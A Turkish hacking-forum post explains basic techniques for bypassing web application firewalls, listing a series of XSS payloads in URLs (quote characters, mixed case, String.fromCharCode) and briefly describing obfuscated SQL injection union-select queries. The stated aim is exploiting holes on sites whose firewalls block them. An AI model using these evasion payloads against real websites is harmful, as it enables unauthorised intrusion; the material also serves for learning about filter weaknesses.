Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Waf attacks
#1
Merhaba arkadaşlar,
Bu dersimde sizlere Web application firewall(waf)'dan bahsetmek istiyorum.
hatam olduysa özür dilerim bu makaleyi saat 01:28'de yazıyorum uykum çok ağır kiss

Not: Waf ile ilgili hiç bir döküman bulamadım cyberizm.org'da ve bende yazma kararı aldım, bu makalemde waf ile ilgili çok büyük şeyler anlatmıyacağım sadece temel bir bilgi vericeğim konuyu daha iyi anlıyabilmeniz için eğer geliştirmek istiyorsanız kendinizi google'dan yardım alın kiss

www.deccal.org

Web application firewalls nerelerde kullanılır,
Mesela bir web sitesinde açık bulduk fakat site'nin güvenlik duvarlarından dolayı ilerliyemiyoruz bu açığıda kullanmıyoruz bu makalemde bu güvenlik duvarını atalarak açığı nasıl uygularız onu anlatıcağım fakat temel bir bilgi vericeğim
Eğer uzmanlaşmak istiyorsanız google amca yardımcı olabilir...


Şimdi size tek tek her açıktan güvenlik duvarını nasıl atlarız anlatmıyacam fakat
basit bir kaç yöntemle güvenlik duvarlarını nasıl atlatıcağımızı göstericeğim.


Mesela elimizde bir link var xss açıklı, ona javascript kodu gönderelim.

http://www.site.com/index.php?id=<script>alert("x"); </script>

Bu JavaScript komutunu bize çalıştırmadı. Şimdi devreye güvenlik duvarını
Atlatmak geliyor...
Karekterler ekliyelim yani (",/,<,> gibi vs )


http://www.site.com/index.php?id="><script>alert("x"); </script>

Gördüğünüz gibi yeni karekterler ekledik, çalışmadı olarak varsayiyoruz...

http://www.site.com/index.php?id="/><script>alert(1); </script>

değeri değiştiriyoruz az önce string'di şimdi integer yaptık...
Yine bunda'da çalışmadı olarak varsayiyoruz...

Şimdi kodları büyük ve küçük harf olarak ayarlıyoruz.

http://www.site.com/index.php?id="/><ScRipt>aLerT(1); </script>

Bundada olmadıysa javascript ile char kodlar ekliyoruz ...

http://www.site.com/index.php?id="/><ScRipt>aLeRt(string.fromCharCode(88, 83, 83)) </script>

evet şimdi çalıştı Xss açığını keşfettik, uzatmamak için size bu temel'i anlattım yoksa verilecek yüzlerce örnek var size burada 1 makalede hepsini anlatamam


Şimdi mysql injection'dan ufak bir giriş yaparak konuyu kapatmak istiyorum.

Örnek olarak +union+select+1,2,3,4-- komutu kullandığımızda bize çalıştırmaz bunun için özel karekterler ekleriz... /,*,<,! vb.


http://www.site.com/index.php?id=makale+...+(1,2,3,4)--

veya komutları büyük veya küçük harfleri çeviririz.

http://www.site.com/index.php?id=makale+...+(1,2,3,4)--


gibi neyse çok fazla uzatmak istemiyorum,Çünkü bu konuyu araştırarak öğrenmenizi istiyorum sadece bu makalemde sizlere Waf nedir bunun hakkında aklınızda temel bir bilgi olsun diye bunları anlattım...

İleriki zamanlarda bununla ilgili eğitim videosu çekiceğim, ileri seviye Sadece bu bilgileri temel olsun diye veriyorum.
Not: Eğer yazımda hatam olduysa Özür dilerim saat 01:46 gözümü açamıyorum uykusuzluktan kiss
Beğenenler:
#2
Güzel Makale Teşekkürler
Beğenenler:
#3
eline sağlık
Beğenenler:

Anahtar Kelimeler

Waf attacks indir, Waf attacks Videosu, Waf attacks Online izle, Waf attacks Bedava indir, Waf attacks Yükle, Waf attacks Hakkında, Waf attacks Nedir, Waf attacks Free indir, Waf attacks Oyunu, Waf attacks Download


1 Ziyaretçi